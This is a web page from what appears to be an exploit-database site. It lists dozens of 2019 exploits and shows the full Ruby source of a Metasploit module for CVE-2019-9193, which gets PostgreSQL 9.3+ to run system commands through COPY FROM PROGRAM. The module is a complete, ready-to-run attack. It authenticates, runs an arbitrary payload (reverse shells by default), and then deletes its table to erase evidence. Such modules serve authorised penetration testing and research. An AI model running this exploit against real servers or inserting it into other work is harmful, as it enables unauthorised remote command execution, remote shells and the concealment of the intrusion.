Menu

Improved exploit search engine. Try it out

"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)"

Author

Metasploit

Platform

multiple

Release date

2019-05-08

Release Date Title Type Platform Author
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Deluge 1.3.15 - 'URL' Denial of Service (PoC)" dos multiple "Victor Mondragón"
2019-05-13 "Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-05-10 "CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection" webapps multiple "Marcelo Toran"
2019-05-10 "TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery" webapps multiple "Alexandre Basquin"
2019-05-07 "Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting" webapps multiple alt3kx
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
2019-05-03 "Zotonic < 0.47.0 mod_admin - Cross-Site Scripting" webapps multiple "Ramòn Janssen"
2019-04-30 "Domoticz 4.10577 - Unauthenticated Remote Command Execution" webapps multiple "Fabio Carretto"
2019-04-24 "Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow" remote multiple "Google Security Research"
2019-04-22 "ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-04-22 "Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)" dos multiple "Bogdan Kurinnoy"
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-18 "Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)" dos multiple "Fakhri Zulkifli"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID" dos multiple "Google Security Research"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4" dos multiple "Google Security Research"
2019-04-09 "Apache Axis 1.4 - Remote Code Execution" remote multiple "David Yesland"
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2019-04-03 "Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion" remote multiple "Google Security Research"
2019-04-03 "Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion" dos multiple "Google Security Research"
2019-04-03 "Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-28 "CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)" remote php Metasploit
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46813/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46813/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46813/41244/postgresql-93-copy-from-program-command-execution-metasploit/download/", "exploit_id": "46813", "exploit_description": "\"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)\"", "exploit_date": "2019-05-08", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
\##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/postgres'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Postgres
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
      'Description' => %q(
        Installations running Postgres 9.3 and above have functionality which allows for the superuser
        and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
        This allows arbitrary command execution as though you have console access.

        This module attempts to create a new table, then execute system commands in the context of
        copying the command output into the table.

        This module should work on all Postgres systems running version 9.3 and above.

        For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl

        For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp
        Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
        or other customised command.
      ),
      'Author' => [
        'Jacob Wilkin' # Exploit Author of Module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2019-9193'],
        ['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
        ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
      ],
      'PayloadType' => 'cmd',
      'Platform' => %w(linux unix win osx),
      'Payload' => {
      },
      'Arch' => [ARCH_CMD],
      'Targets'        =>
        [
          [
            'Unix/OSX/Linux', {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'Payload' => 'cmd/unix/reverse_perl' }
              }
          ],[
            'Windows - PowerShell (In-Memory)', {
              'Platform' => 'windows',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'Payload' => 'cmd/windows/powershell_reverse_tcp' }
              }
          ],[
            'Windows (CMD)',
            'Platform'   => 'win',
            'Arch'       => [ARCH_CMD],
            'Payload' => {
              'Compat'     => {
                'PayloadType' => 'cmd',
                'RequiredCmd' => 'adduser, generic'
              }
            }
          ],
        ],
      'DisclosureDate' => 'Mar 20 2019'
    ))

    register_options([
      Opt::RPORT(5432),
      OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
      OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
      ])

    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
  end

  # Return the datastore value of the same name
  # @return [String] tablename for table to use with command execution
  def tablename
    datastore['TABLENAME']
  end

  def check
    vuln_version? ? CheckCode::Appears : CheckCode::Safe
  end

  def vuln_version?
    version = postgres_fingerprint
    return false unless version[:auth]
    vprint_status version[:auth].to_s
    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
    if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
      return true
    else
      return false
    end
  end

  def login_success?
    status = do_login(username, password, database)
    case status
    when :noauth
      print_error "#{peer} - Authentication failed"
      return false
    when :noconn
      print_error "#{peer} - Connection failed"
      return false
    else
      print_status "#{peer} - #{status}"
      return true
    end
  end

  def execute_payload
    # Drop table if it exists
    query = "DROP TABLE IF EXISTS #{tablename};"
    drop_query = postgres_query(query)
    case drop_query.keys[0]
    when :conn_error
      print_error "#{peer} - Connection error"
      return false
    when :sql_error
      print_warning "#{peer} - Unable to execute query: #{query}"
      return false
    when :complete
      print_good "#{peer} - #{tablename} dropped successfully"
    else
      print_error "#{peer} - Unknown"
      return false
    end

    # Create Table
    query = "CREATE TABLE #{tablename}(filename text);"
    create_query = postgres_query(query)
    case create_query.keys[0]
    when :conn_error
      print_error "#{peer} - Connection error"
      return false
    when :sql_error
      print_warning "#{peer} - Unable to execute query: #{query}"
      return false
    when :complete
      print_good "#{peer} - #{tablename} created successfully"
    else
      print_error "#{peer} - Unknown"
      return false
    end

    # Copy Command into Table
    cmd_filtered = payload.encoded.gsub("'", "''")
    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
    copy_query = postgres_query(query)
    case copy_query.keys[0]
    when :conn_error
      print_error "#{peer} - Connection error"
      return false
    when :sql_error
      print_warning "#{peer} - Unable to execute query: #{query}"
      if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
        print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
        return false
      end
      print_warning "#{peer} - Unable to execute query: #{query}"
      return false
    when :complete
      print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
    else
      print_error "#{peer} - Unknown"
      return false
    end

    if datastore['DUMP_TABLE_OUTPUT']
    # Select output from table for debugging
      query = "SELECT * FROM #{tablename};"
      select_query = postgres_query(query)
      case select_query.keys[0]
      when :conn_error
        print_error "#{peer} - Connection error"
        return false
      when :sql_error
        print_warning "#{peer} - Unable to execute query: #{query}"
        return false
      when :complete
        print_good "#{peer} - #{tablename} contents:\n#{select_query}"
        return true
      else
        print_error "#{peer} - Unknown"
        return false
      end
    end
    # Clean up table evidence
    query = "DROP TABLE IF EXISTS #{tablename};"
    drop_query = postgres_query(query)
    case drop_query.keys[0]
    when :conn_error
      print_error "#{peer} - Connection error"
      return false
    when :sql_error
      print_warning "#{peer} - Unable to execute query: #{query}"
      return false
    when :complete
      print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
    else
      print_error "#{peer} - Unknown"
      return false
    end
  end

  def do_login(user, pass, database)
    begin
      password = pass || postgres_password
      result = postgres_fingerprint(
        db: database,
        username: user,
        password: password
      )

      return result[:auth] if result[:auth]
      print_error "#{peer} - Login failed"
      return :noauth

    rescue Rex::ConnectionError
      return :noconn
    end
  end

  def exploit
    #vuln_version doesn't seem to work
    #return unless vuln_version?
    return unless login_success?
    print_status("Exploiting...")
    if execute_payload
      print_status("Exploit Succeeded")
    else
      print_error("Exploit Failed")
    end
    postgres_logout if @postgres_conn
  end
end